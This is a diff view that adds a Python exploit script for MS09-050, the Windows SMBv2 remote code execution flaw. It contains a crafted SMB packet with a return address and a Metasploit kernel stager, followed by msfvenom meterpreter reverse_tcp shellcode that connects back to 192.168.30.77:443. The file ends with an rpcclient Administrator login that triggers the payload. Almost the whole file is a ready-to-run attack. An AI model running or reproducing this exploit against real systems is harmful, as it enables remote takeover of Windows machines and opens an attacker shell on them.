|
| 1 | +# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py |
| 2 | + |
| 3 | +#!/usr/bin/python |
| 4 | +#This module depends on the linux command line program smbclient. |
| 5 | +#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python. |
| 6 | +#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter. |
| 7 | +import tempfile |
| 8 | +import sys |
| 9 | +import subprocess |
| 10 | +from socket import socket |
| 11 | +from time import sleep |
| 12 | +from smb.SMBConnection import SMBConnection |
| 13 | + |
| 14 | + |
| 15 | +try: |
| 16 | + |
| 17 | + target = sys.argv[1] |
| 18 | +except IndexError: |
| 19 | + print '\nUsage: %s <target ip>\n' % sys.argv[0] |
| 20 | + print 'Example: MS36299.py 192.168.1.1 1\n' |
| 21 | + sys.exit(-1) |
| 22 | + |
| 23 | +#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python |
| 24 | +shell = "" |
| 25 | +shell += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" #fce8820000006089e531c0648b |
| 26 | +shell += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" |
| 27 | +shell += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" |
| 28 | +shell += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" |
| 29 | +shell += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" |
| 30 | +shell += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" |
| 31 | +shell += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" |
| 32 | +shell += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" |
| 33 | +shell += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" |
| 34 | +shell += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" |
| 35 | +shell += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" |
| 36 | +shell += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" |
| 37 | +shell += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" |
| 38 | +shell += "\xff\xd5\x6a\x05\x68\xc0\xa8\x1e\x4d\x68\x02\x00\x01" |
| 39 | +shell += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" |
| 40 | +shell += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" |
| 41 | +shell += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec" |
| 42 | +shell += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02" |
| 43 | +shell += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a" |
| 44 | +shell += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53" |
| 45 | +shell += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" |
| 46 | +shell += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40" |
| 47 | +shell += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57" |
| 48 | +shell += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9" |
| 49 | +shell += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0" |
| 50 | +shell += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" |
| 51 | +shell += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00" |
| 52 | +shell += "\x53\xff\xd5" |
| 53 | + |
| 54 | + |
| 55 | + |
| 56 | +host = target, 445 |
| 57 | + |
| 58 | +buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42" |
| 59 | +buff+="\x72\x00\x00\x00\x00\x18\x53\xc8" |
| 60 | +buff+="\x17\x02" #high process ID |
| 61 | +buff+="\x00\xe9\x58\x01\x00\x00" |
| 62 | +buff+="\x00\x00\x00\x00\x00\x00\x00\x00" |
| 63 | +buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02" |
| 64 | +buff+="\x04\x0d\xdf\xff"*25 |
| 65 | +buff+="\x00\x02\x53\x4d" |
| 66 | +buff+="\x42\x20\x32\x2e\x30\x30\x32\x00" |
| 67 | +buff+="\x00\x00\x00\x00"*37 |
| 68 | +buff+="\xff\xff\xff\xff"*2 |
| 69 | +buff+="\x42\x42\x42\x42"*7 |
| 70 | +buff+="\xb4\xff\xff\x3f" #magic index |
| 71 | +buff+="\x41\x41\x41\x41"*6 |
| 72 | +buff+="\x09\x0d\xd0\xff" #return address |
| 73 | + |
| 74 | +#stager_sysenter_hook from metasploit |
| 75 | + |
| 76 | +buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01" |
| 77 | +buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d" |
| 78 | +buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9" |
| 79 | +buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4" |
| 80 | +buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a" |
| 81 | +buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00" |
| 82 | +buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24" |
| 83 | +buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10" |
| 84 | +buff+="\x68\x76\x01\x00\x00\x59\x89\xd8" |
| 85 | +buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31" |
| 86 | +buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb" |
| 87 | +buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d" |
| 88 | +buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00" |
| 89 | +buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10" |
| 90 | +buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0" |
| 91 | +buff+="\x83\xc2\x04\x81\x22\xff\xff\xff" |
| 92 | +buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff" |
| 93 | +buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f" |
| 94 | +buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18" |
| 95 | +buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10" |
| 96 | +buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08" |
| 97 | +buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73" |
| 98 | +buff+="\x73\x75\x15\xe8\x07\x00\x00\x00" |
| 99 | +buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9" |
| 100 | +buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34" |
| 101 | +buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff" |
| 102 | + |
| 103 | +buff+=shell |
| 104 | + |
| 105 | +s = socket() |
| 106 | +s.connect(host) |
| 107 | +s.send(buff) |
| 108 | +s.close() |
| 109 | +#Trigger the above injected code via authenticated process. |
| 110 | +subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True) |
0 commit comments